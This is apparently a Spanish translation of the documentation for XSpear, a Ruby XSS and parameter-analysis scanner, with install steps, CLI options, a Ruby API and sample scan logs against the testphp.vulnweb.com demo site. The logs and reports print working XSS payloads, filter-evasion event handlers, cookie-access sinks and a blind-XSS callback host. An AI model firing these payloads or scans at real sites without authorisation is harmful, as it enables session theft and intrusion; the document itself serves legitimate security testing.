XSpear – Potente herramienta de análisis de parámetros y escaneo XSS

XSpear es un poderoso escáner disponible en ruby gems.
Características importantes
- Escaneo XSS basado en coincidencia de patrones
- Detecta eventos alert, confirm y prompt en navegadores (con Selenium)
- Solicitud/respuesta de prueba para evasión de protección XSS y parámetros reflejados
- Parámetros reflejados
- Prueba filtrada event, handler HTML tag, Special Char
- Prueba de Blind XSS (con XSS Hunter, ezXSS, HBXSS, Etc, prueba de todas las URL blind…)
- Análisis Dinámico/Estático
- Busca patrón de error de SQL
- Análisis de encabezados de seguridad (CSP, HSTS, X-frame-options, XSS-protection, etc.)
- Análisis Otros encabezados. (Versión del servidor, Tipo de contenido, etc.)
- Escaneo desde archivo RAW (Burp suite, solicitud ZAP)
- XSpear se ejecuta en código ruby (con la biblioteca Gem)
- Muestra reportes basados en tablas de linea de comando y filtrado de reglas, prueba de consulta sin procesar(url)
- Prueba en parámetros seleccionados
- Formato de salida de soporte cli y json
- cli: resumen, regla filtrada (params), Consulta sin formato
- Admite nivel detallado (salir/nomal/datos brutos)
- Admite código de devolución de llamada personalizado para cualquier prueba de varios vectores de ataque
Puedes Instalarlo tú mismo así:
$ gem install XSpear
O instálalo así (archivo local):
$ gem install XSpear-{version}.gem
Agrega esta línea al Gemfile de tu aplicación:
gem 'XSpear'
Y luego ejecuta:
$ bundle
Dependencia gems
colorize. selenium-webdriver, terminal-table
Si lo configuraste para que se instale automáticamente en la biblioteca Gem, pero se comporta de manera anormal, instálalo con el siguiente comando.
$ gem install colorize $ gem install selenium-webdriver $ gem install terminal-table
Uso en cli
Usage: xspear -u [target] -[options] [value] [ e.g ] $ ruby a.rb -u 'https://www.hahwul.com/?q=123' --cookie='role=admin' [ Options ] -u, --url=target_URL [required] Target Url -d, --data=POST Body [optional] POST Method Body data --headers=HEADERS [optional] Add HTTP Headers --cookie=COOKIE [optional] Add Cookie --raw=FILENAME [optional] Load raw file(e.g raw_sample.txt) -p, --param=PARAM [optional] Test paramters -b, --BLIND=URL [optional] Add vector of Blind XSS + with XSS Hunter, ezXSS, HBXSS, etc... + e.g : -b https://hahwul.xss.ht -t, --threads=NUMBER [optional] thread , default: 10 -o, --output=FILENAME [optional] Save JSON Result -v, --verbose=1~3 [optional] Show log depth + Default value: 2 + v=1 : quite mode + v=2 : show scanning log + v=3 : show detail log(req/res) -h, --help Prints this help --version Show XSpear version --update Update with online
Tipos de resultados
- (I)NFO: Obtener información (por ejemplo, error de sql, regla filtrada, parámetros reflejados, etc.)
- (V)UNL: XSS vulnerable, alerta marcada/aviso/confirmación con selenium
- (L)OW: problema de bajo nivel
- (M)EDIUM: problema de nivel medio
- (H)IGH: problema de alto nivel
Caso por caso
Escaneo XSS
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy"
Salida json
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1
Registro detallado
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -v 3
Establecer hilo
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -t 30
Prueba en parámetros seleccionados
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query&cat=123&ppl=1fhhahwul" -p cat,test
Prueba blind xss
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -b "https://hahwul.xss.ht"
Ejemplo de registros
Escaneo XSS
xspear -u "http://testphp.vulnweb.com/listproducts.php?cat=z" ) ( ( /( )\ ) )\())(()/( ( ) ( ((_)\ /(_))` ) ))\ ( /( )( __((_)(_)) /(/( /((_))(_))(()\ \ \/ // __|((_)_\ (_)) ((_)_ ((_) > < \__ \| '_ \)/ -_)/ _` || '_| /_/\_\|___/| .__/ \___|\__,_||_| /> |_| \ /< {\\\\\\\\\\\\\BYHAHWUL\\\\\\\\\\\(0):::<======================- / \< \> [ v1.0.7 ] [*] creating a test query. [*] test query generation is complete. [149 query] [*] starting test and analysis. [10 threads] [I] [00:37:34] reflected 'XsPeaR [-] [00:37:34] 'cat' Not reflected |XsPeaR [I] [00:37:34] [param: cat][Found SQL Error Pattern] [-] [00:37:34] 'STATIC' not reflected [I] [00:37:34] reflected "XsPeaR [-] [00:37:34] 'cat' Not reflected ;XsPeaR [I] [00:37:34] reflected `XsPeaR ...snip... [H] [00:37:44] reflected "><iframe/src=JavaScriPt:alert(45)>[param: cat][reflected XSS Code] [-] [00:37:44] 'cat' not reflected <img/src onerror=alert(45)> [-] [00:37:44] 'cat' not reflected <svg/onload=alert(45)> [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)> [-] [00:37:49] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)> [-] [00:37:50] 'cat' not found alert/prompt/confirm event <xmp><p title="</xmp><svg/onload=alert(45)>"> [-] [00:37:51] 'cat' not found alert/prompt/confirm event '"><svg/onload=alert(45)> [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! <script>alert(45)</script> => [param: cat][triggered <script>alert(45)</script>] [V] [00:37:51] found alert/prompt/confirm (45) in selenium!! '"><svg/onload=alert(45)> => [param: cat][triggered <svg/onload=alert(45)>] [*] finish scan. the report is being generated.. +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+ | [ XSpear report ] | | http://testphp.vulnweb.com/listproducts.php?cat=z | | 2019-07-24 00:37:33 +0900 ~ 2019-07-24 00:37:51 +0900 Found 12 issues. | +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+ | NO | TYPE | ISSUE | METHOD | PARAM | PAYLOAD | DESCRIPTION | +----+-------+------------------+--------+---- ---+-------------------------------------+--------------------------------------------+ | 0 | INFO | DYNAMIC ANALYSIS | GET | cat | XsPeaR" | Found SQL Error Pattern | | 1 | INFO | STATIC ANALYSIS | GET | - | original query | Found Server: nginx/1.4.1 | | 2 | INFO | STATIC ANALYSIS | GET | - | original query | Not set HSTS | | 3 | INFO | STATIC ANALYSIS | GET | - | original query | Content-Type: text/html | | 4 | LOW | STATIC ANALYSIS | GET | - | original query | Not Set X-Frame-Options | | 5 | MIDUM | STATIC ANALYSIS | GET | - | original query | Not Set CSP | | 6 | INFO | REFLECTED | GET | cat | rEfe6 | reflected parameter | | 7 | INFO | FILERD RULE | GET | cat | onhwul=64 | not filtered event handler on{any} pattern | | 8 | HIGH | XSS | GET | cat | <script>alert(45)</script> | reflected XSS Code | | 9 | HIGH | XSS | GET | cat | "><iframe/src=JavaScriPt:alert(45)> | reflected XSS Code | | 10 | VULN | XSS | GET | cat | <script>alert(45)</script> | triggered <script>alert(45)</script> | | 11 | VULN | XSS | GET | cat | '"><svg/onload=alert(45)> | triggered <svg/onload=alert(45)> | +----+-------+------------------+--------+-------+-------------------------------------+--------------------------------------------+ < Available Objects > [cat] param + Available Special Char: ' \ ` ) [ } : . { ] $ + Available Event Handler: "onActivate","onBeforeActivate","onAfterUpdate","onAbort","onAfterPrint","onBeforeCopy","onBeforeCut","onBeforePaste","onBlur","onBeforePrint","onBeforeDeactivate","onBeforeUpdate","onBeforeEditFocus","onBegin","onBeforeUnload","onBounce","onDataSetChanged","onCellChange","onClick","onDataAvailable","onChange","onContextMenu","onCopy","onControlSelect","onDataSetComplete","onCut","onDragStart","onDragEnter","onDragOver","onDblClick","onDragEnd","onDrop","onDeactivate","onDragLeave","onDrag","onDragDrop","onHashChange","onFocusOut","onFilterChange","onEnd","onFocus","onHelp","onErrorUpdate","onFocusIn","onFinish","onError","onLayoutComplete","onKeyDown","onKeyUp","onMediaError","onLoad","onMediaComplete","onInput","onKeyPress","onloadstart","onLoseCapture","onMouseOut","onMouseDown","onMouseWheel","onMove","onMouseLeave","onMessage","onMouseEnter","onMouseMove","onMouseOver","onMouseUp","onPropertyChange ","onMoveStart","onProgress","onPopState","onPaste","onOnline","onMoveEnd","onPause","onOutOfSync","onOffline","onReverse","onResize","onRedo","onRowsEnter","onRepeat","onReset","onResizeEnd","onResizeStart","onReadyStateChange","onResume","onRowInserted","onStart","onScroll","onRowExit","onSelectionChange","onSeek","onStop","onRowDelete","onSelectStart","onSelect","ontouchstart","ontouchend","onTrackChange","onSyncRestored","onTimeError","onUndo","onURLFlip","onStorage","onUnload","onSubmit","ontouchmove" + Available HTML Tag: "meta","video","iframe","embed","script","audio","svg","object","img","frameset","applet","style","frame" + Available Useful Code: "document.cookie","document.location","window.location" < Raw Query > [0] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zXsPeaR%22 [1] http://testphp.vulnweb.com/listproducts.php?cat=z?- [2] http://testphp.vulnweb.com/listproducts.php?cat=z?- [3] http://testphp.vulnweb.com/listproducts.p hp?cat=z?- [4] http://testphp.vulnweb.com/listproducts.php?cat=z?- [5] http://testphp.vulnweb.com/listproducts.php?cat=z?- [6] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=zrEfe6 [7] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%5C%22%3E%3Cxspear+onhwul%3D64%3E [8] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E [9] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Ciframe%2Fsrc%3DJavaScriPt%3Aalert%2845%29%3E [10] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E [11] http://testphp.vulnweb.com/listproducts.php?cat=z?cat=z%27%22%3E%3Csvg%2Fonload%3Dalert%2845%29%3E
A json
$ xspear -u "http://testphp.vulnweb.com/search.php?test=query" -d "searchFor=yy" -o json -v 1 {"starttime":"2019-07-17 01:02:13 +0900","endtime":"2019-07-17 01:02:59 +0900","issue_count":24,"issue_list":[{"id":0,"type":"INFO","issue":"FILERD RULE", "payload":"searchFor=yy%3CXsPeaR","description":"not filtered \u001b[0;34;49m<\u001b[0m"},{"id":1,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%27" ,"description":"not filtered \u001b[0;34;49m'\u001b[0m"},{"id":2,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3E","description": "not filtered \u001b[0;34;49m>\u001b[0m"},{"id":3,"type":"INFO","issue":"REFLECTED","payload":"searchFor=yyrEfe6","description":"reflected parameter"}, {"id":4,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%22","description":"not filtered \u001b[0;34;49m\"\u001b[0m"},{"id":5,"type":"INFO", "issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%60","description":"not filtered \u001b[0;34;49m`\u001 b[0m"},{"id":6,"type":"INFO","issue":"FILERD RULE", "payload":"searchFor=yyXsPeaR%3B","description":"not filtered \u001b[0;34;49m;\u001b[0m"},{"id":7,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%28", "description":"not filtered \u001b[0;34;49m(\u001b[0m"},{"id":8,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%7C","description": "not filtered \u001b[0;34;49m|\u001b[0m"},{"id":9,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%29","description":"not filtered \u001b[0;34;49m)\u001b[0m"}, {"id":10,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%7B","description":"not filtered \u001b[0;34;49m{\u001b[0m"},{"id":11,"type":"INFO","issue":"FILERD RULE", "payload":"searchFor=yyXsPeaR%5B","description":"not filtered \u001b[0;34;49m[\u001b[0m"},{"id":12,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%5D", "description":"not filtered \u001b[0;34;49m]\u001b[0m"},{"id":13,"type":"INFO","issue":"FILERD RULE","pay load":"searchFor=yyXsPeaR%7D","description": "not filtered \u001b[0;34;49m}\u001b[0m"},{"id":14,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3A","description":"not filtered \u001b[0;34;49m:\u001b[0m"}, {"id":15,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%2B","description":"not filtered \u001b[0;34;49m+\u001b[0m"},{"id":16,"type":"INFO","issue": "FILERD RULE","payload":"searchFor=yyXsPeaR.","description":"not filtered \u001b[0;34;49m.\u001b[0m"},{"id":17,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR-", "description":"not filtered \u001b[0;34;49m-\u001b[0m"},{"id":18,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%2C","description": "not filtered \u001b[0;34;49m,\u001b[0m"},{"id":19,"type":"INFO","issue":"FILERD RULE","payload":"searchFor=yyXsPeaR%3D","description":"not filtered \u001b[0;34;49m=\u001b[0m"}, {"id":20,"type":"HIGH","issue":"XSS","payload":"searchFor=yy%3Cimg%2Fsrc+onerror%3Dalert%2845%29%3E","des cription":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},{"id":21,"type": "HIGH","issue":"XSS","payload":"searchFor=yy%3Csvg%2Fonload%3Dalert%2845%29%3E","description":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},{"id":22,"type":"HIGH","issue":"XSS", "payload":"searchFor=yy%22%3E%3Cscript%3Ealert%2845%29%3C%2Fscript%3E","description":"reflected \u001b[0;31;49mXSS Code\u001b[0m"},{"id":23,"type":"INFO","issue":"FILERD RULE", "payload":"searchFor=yyXsPeaR%24","description":"not filtered \u001b[0;34;49m$\u001b[0m"}]}
Uso en código ruby (biblioteca gem)
require 'XSPear' # Set options options = {} options['thread'] = 30 options['cookie'] = "data=123" options['blind'] = "https://hahwul.xss.ht" options['output'] = json # Create XSpear object with url, options s = XspearScan.new "https://www.hahwul.com?target_url", options # Scanning s.run result = s.report.to_json r = JSON.parse result
Agregar módulo de escaneo
1) Agregar makeQueryPattern
makeQueryPattern('type', 'query,', 'pattern', 'category', "description", "callback funcion") # type: f(ilterd?) r(eflected?) x(ss?) # category i(nfo) v(uln) l(ow) m(edium) h(igh) # e.g # makeQueryPattern('f', 'XsPeaR,', 'XsPeaR,', 'i', "not filtered "+",".blue, CallbackStringMatch)
2) Si hay otro callback, escribe la anulación de la clase callback, por medio de ScanCallbackFunc
class CallbackStringMatch < ScanCallbackFunc def run if @response.body.include? @query [true, "reflected #{@query}"] else [false, "not reflected #{@query}"] end end end
Clase principal (ScanCallbackFunc)
class ScanCallbackFunc() def initialize(url, method, query, response) @url = url @method = method @query = query @response = response # self.run end def run # override end end
Clase Callback común
- CallbackXSSSelenium
- CallbackErrorPatternMatch
- CallbackCheckHeaders
- CallbackStringMatch
- CallbackNotAdded, etc.
Si eres usuario normal
$ gem update XSpear
Para un desarrollador (software)
$ git pull -v
Si eres desarrollador (hardware)
$ git reset --hard HEAD; git pull -v
Después de revisar el repositorio, hay que ejecutar bin/setup para instalar dependencias, luego debes ejecutar rake spec para ejecutar las pruebas. También puedes ejecutar bin/console, una solicitud interactiva que te permitirá experimentar.
Para instalar gem en tu máquina local, ejecuta bundle exec rake install. Para obtener una nueva versión, actualiza el número de versión version.rb y luego ejecuta bundle exec rake release, lo que creará una etiqueta git para la versión, tendrás git commits y etiquetas, y obtendrás el archivo .gem de rubygems.org .
Los informes de errores y las solicitudes de extracción son bienvenidos en GitHub en la dirección https://github.com/hahwul/XSpear. Este proyecto pretende ser un espacio seguro y acogedor para la colaboración, y se espera que los contribuyentes se adhieran al código de conducta de Contributor Covenant.
Código de conducta
Todos los que interactúen en las bases de códigos, rastreadores de problemas, salas de chat y listas de correo del proyecto XSpear deben seguir el código de conducta.